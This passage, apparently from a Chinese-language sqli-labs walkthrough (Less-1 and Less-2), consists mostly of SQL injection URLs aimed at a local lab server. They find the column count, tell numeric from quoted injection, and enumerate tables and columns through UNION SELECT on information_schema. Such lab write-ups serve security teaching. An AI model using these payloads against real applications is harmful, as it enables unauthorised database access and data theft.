http://192.168.31.207/sqli/Less-1?id=1' order by 4--+ #4报错,说明有3个字段
1
http://192.168.31.207/sqli/Less-1?id=-1' union select 1,2,group_concat(table_name) from information_schema.tables --+ #查看所有的表
1
http://192.168.31.207/sqli/Less-1?id=-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name = "SCHEMATA"--+ #查询schemata表中所有的列名
Less-2
第二关也是单引号报错
1 2 3
http://192.168.31.207/sqli/Less-2?id=1 and 1=1--+ #正常 http://192.168.31.207/sqli/Less-2?id=1 and 1=12--+ #不正常,说明是数字型注入 http://192.168.31.207/sqli/Less-2?id=-1 union select 1,2,group_concat(table_name) from information_schema.tables--+ #查询所有表名